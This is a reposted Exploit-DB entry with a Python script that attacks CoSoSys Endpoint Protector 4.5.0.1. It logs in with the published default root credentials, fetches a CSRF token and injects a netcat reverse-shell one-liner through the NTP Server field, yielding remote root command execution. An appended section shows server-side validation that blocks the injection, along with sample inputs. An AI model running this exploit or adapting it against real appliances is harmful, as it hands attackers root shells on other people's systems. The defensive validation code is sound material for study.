CoSoSys Endpoint Protector 4.5.0.1 – (Authenticated) Remote Root Command Injection

  • Author: 0x09AL
  • Date: 2018-08-02
  • Source: https://www.exploit-db.com/exploits/45131/
    # Title : CoSoSys Endpoint Protector - Authenticated Remote Root Command Injection
    # Date : Vulnerability submitted in 01/12/2017 and published in 01/08/2018
    # Author : 0x09AL
    # Tested on : Endpoint Protector 4.5.0.1
    # Software Link : https://www.endpointprotector.com/
    # Vulnerable Versions : Endpoint Protector <= 4.5.0.1
    # Endpoint Protector suffers from an authenticated command injection vulnerability. By default the username and password are root:epp2011
    # In the Appliance Tab, Server Maintenance, the NTP Server field is vulnerable to command injection. There is a call to sh -c {NTP Server field} which is not validated. Attached is the exploit which does this automatically.
    # The command may take a while to execute.

    import requests

    exp = requests.session()
    user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'  # defined by the original script but never sent

    username = 'root'
    password = 'epp2011'

    host = 'x.x.x.x.x'     # appliance address (placeholder)
    rev_host = 'x.x.x.x'   # listener address (placeholder)
    rev_port = '443'

    # Step 1: authenticate against the appliance web console with the default credentials
    r = exp.post('https://%s/index.php/login' % host, data={'username': username, 'password': password, 'login': 'Login'}, verify=False)

    # The string placed in the NTP Server field; the appliance passes that field to sh -c without validation
    shell = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f' % (rev_host, rev_port)

    payload = '&& %s' % shell
    print payload
    if(r.text.find("Welcome Guest") > 0):
        print "[-] Incorrect credentials [-]"
    else:
        print "[+] Logged in successfully [+]"
        # Step 2: load the maintenance page to pick up the CSRF token
        r = exp.get('https://%s/index.php/appliance/maintenance' % host, headers={'X-Requested-With': 'XMLHttpRequest'}, verify=False)
        if(r.text.find("csrf") > -1):
            print "[+] Getting CSRF Token [+]"
            csrf_token = r.text.split('value="')[1].split('">')[0]

            print "[+] Token: %s [+]" % csrf_token
            # Step 3: submit the timezone form with the payload in timeSetting[ntpserver]
            post_data = {
                'csrf_token': csrf_token,
                'continent': 'Europe',
                'region': 'Berlin',
                'timeSetting[ntpserver]': payload,
                'timeSetting[timesync]': '12'
            }
            r = exp.post('https://%s/index.php/appliance/timezone' % host, data=post_data, headers={'X-Requested-With': 'XMLHttpRequest', 'Referer': 'https://%s/index.php/' % host}, verify=False)
            print "[+] Sending exploit [+]"

            # If the response echoes the field back, resubmit it under the flat 'ntpserver' key
            if(r.text.find("nc") > -1):
                post_data = {
                    'ntpserver': payload,
                    'continent': 'Europe',
                    'region': 'Berlin'
                }

                r = exp.post('https://%s/index.php/appliance/timezone' % host, data=post_data, headers={'X-Requested-With': 'XMLHttpRequest', 'Referer': 'https://%s/index.php/' % host}, verify=False)
                print "[+] Exploit success [+]"
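The root cause described above is that the NTP Server field reaches `sh -c` unvalidated. As an added example (not CoSoSys code and not part of the original advisory), this is how such a field should be handled on the server side: an allow-list check that accepts only an IP literal or a plain hostname, followed by an argv-based call that never invokes a shell. The tool name `ntpdate` and the function names are assumptions; the page does not name the appliance's own time-sync binary.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname label: 1-63 letters, digits or hyphens, no leading/trailing hyphen.
_LABEL = re.compile(r'^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$')


def is_valid_ntp_server(value):
    """Allow-list check: a plain IPv4/IPv6 literal or a dotted hostname, nothing else.
    Whitespace, quotes, '&', ';', '|', '$' and the like can never pass."""
    if not isinstance(value, str) or not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)  # accepts IPv4 and IPv6 literals
        return True
    except ValueError:
        pass
    labels = value.rstrip('.').split('.')
    return all(_LABEL.match(label) for label in labels)


def build_ntp_sync_command(value):
    """Return the argv list for the time-sync call. The vulnerable appliance interpolated
    the field into 'sh -c ...'; here the value is a single argv element and no shell is
    involved, so shell metacharacters are inert even if validation were ever bypassed.
    'ntpdate' is an assumed tool name (the page does not name the real binary)."""
    if not is_valid_ntp_server(value):
        raise ValueError("rejected NTP server value: %r" % (value,))
    return ['ntpdate', '-u', value]


def sync_time(value, run=subprocess.run):
    """Validate, then execute without a shell. 'run' is injectable so callers can dry-run."""
    return run(build_ntp_sync_command(value), shell=False, check=False, timeout=30)


if __name__ == '__main__':
    # Constructed sample inputs: a benign server name and the shape of the page's
    # injection (a command separator appended to the field value).
    for sample in ('pool.ntp.org', 'pool.ntp.org && id'):
        print('%-22s -> %s' % (sample, 'accepted' if is_valid_ntp_server(sample) else 'rejected'))
```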